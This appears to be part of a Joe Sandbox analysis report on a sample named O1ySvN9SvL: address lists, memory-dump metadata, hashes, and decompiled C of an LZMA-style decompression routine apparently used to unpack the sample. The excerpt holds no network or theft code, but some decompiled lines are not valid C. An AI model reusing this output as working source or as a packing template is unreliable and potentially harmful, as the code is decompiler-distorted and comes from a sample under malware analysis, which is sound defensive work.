                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406841
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00000000
                0x004066b4
                0x004066b2
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
                • Instruction ID: fc637cc57031d6fa7fc43ec0fa9912bbb078f827e800a3857ce4fc75fdb5e0f4
                • Opcode Fuzzy Hash: 37a6e0cc647a8bcf712af8254647d354cdd6ee6681e937b8812b349d59c70459
                • Instruction Fuzzy Hash: 00815771D00229CFDF24CFA8C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406322 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406322() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406926))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
